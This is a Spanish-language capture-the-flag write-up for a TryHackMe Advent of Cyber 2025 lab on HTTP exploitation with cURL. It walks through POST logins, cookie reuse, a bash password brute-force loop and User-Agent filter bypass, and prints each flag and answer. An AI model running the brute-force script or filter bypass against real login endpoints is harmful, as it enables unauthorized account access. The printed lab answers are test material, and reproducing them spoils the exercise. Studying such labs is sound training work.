Day 24: Hoperation Eggsploit - Advent of Cyber 2025

Último día del Advent of Cyber 2025 🎉. Hoy practicamos explotación HTTP desde la línea de comandos con cURL: peticiones POST, manejo de cookies/sesiones, bruteforce simple y manipulación del User-Agent.

Room: Exploitation with cURL - Hoperation Eggsploit
Dificultad: Fácil

🚀 Paso 1 — Primer contacto

Comenzamos con una petición sencilla para ver qué ofrece el servidor:

curl http://10.82.180.31/

Respuesta: "Welcome to the cURL practice server! Try sending a POST request to /post.php"

Perfecto: el objetivo nos pide usar POST contra /post.php.

📝 Paso 2 — POST a /post.php (login)

Probamos una petición POST con username y password.

curl -X POST -d "username=user&password=user" http://10.82.180.31/post.php

Respuesta: Invalid credentials.

Con admin:admin la respuesta cambia; el servidor acepta las credenciales y devuelve la flag:

Pregunta: Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?

Respuesta: THM{curl_post_success}

🍪 Paso 3 — Cookies y sesiones

Probamos ahora el manejo de cookies. Primero guardamos la cookie recibida al autenticarnos, y luego la reutilizamos en una petición subsecuente.

Guardar cookie:

curl -c cookies.txt -d "username=admin&password=admin" http://10.82.180.31/cookie.php

Usar cookie guardada:

curl -b cookies.txt http://10.82.180.31/cookie.php

Al reutilizar la cookie obtenemos la flag solicitada por esta parte del reto.

Pregunta: Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?

Respuesta: THM{session_cookie_master}

🔐 Paso 4 — Bruteforce con un script simple

Para el endpoint /bruteforce.php automatizamos intentos de login con un pequeño script loop.sh. La idea es iterar por una lista de contraseñas hasta que el servidor responda con éxito.

#!/bin/bash
for pass in $(cat passwords.txt); do
  echo "Trying password: $pass"
  response=$(curl -s -X POST -d "username=admin&password=$pass" http://10.82.180.31/bruteforce.php)
  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done

Damos permisos y ejecutamos:

chmod +x loop.sh
./loop.sh

Resultado: Password found: secretpass.

Pregunta: After doing the brute force on the /bruteforce.php endpoint, what is the password of the admin user?

Respuesta: secretpass

🕵️‍♀️ Paso 5 — Evadir filtros por User-Agent

Finalmente, probamos el endpoint /agent.php configurando el header User-Agent para simular un cliente concreto. Con -A indicamos el User-Agent a usar:

curl -A "TBFC" http://10.82.180.31/agent.php

Esto nos devuelve la flag final del reto.

Pregunta: Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive?

Respuesta: THM{user_agent_filter_bypassed}

🏁 Conclusión y cierre del Advent of Cyber 2025

Hemos llegado al último día del Advent of Cyber. En estas 24 entradas hemos cubierto una amplia variedad de temas útiles para construir una base sólida en ciberseguridad práctica:

• Técnicas de reconocimiento y escaneo (Nmap, búsquedas de servicios).
• Análisis forense y trabajo con registros/artefactos (Windows Registry, PCAPs, Zeek).
• Web & Appsec: inyección, IDOR, race conditions, cookies y sesión.
• Ofuscación y análisis de malware (PowerShell, HTA, CyberChef).
• OT/ICS: Modbus y controladores (lectura/escritura de registros, remediación segura).
• Automatización con Python para testeo y remediación.
• Cloud: IAM, STS y exfiltración desde S3.
• Herramientas de detection/hunting: RITA y análisis de beacons.

Si quieres revisar la colección completa, la tienes aquí: Colección Advent of Cyber 2025.

Seguiré subiendo contenido relacionado con el hacking y la seguridad; ahora mismo me estoy preparando para el EJPT, así que el contenido próximo no será muy complejo — iré compartiendo lo que aprenda en el camino y ejemplos prácticos para la gente que esté empezando o quiera reforzar conceptos.

¡Gracias por seguir la serie este mes! 🎄

~ Xhetic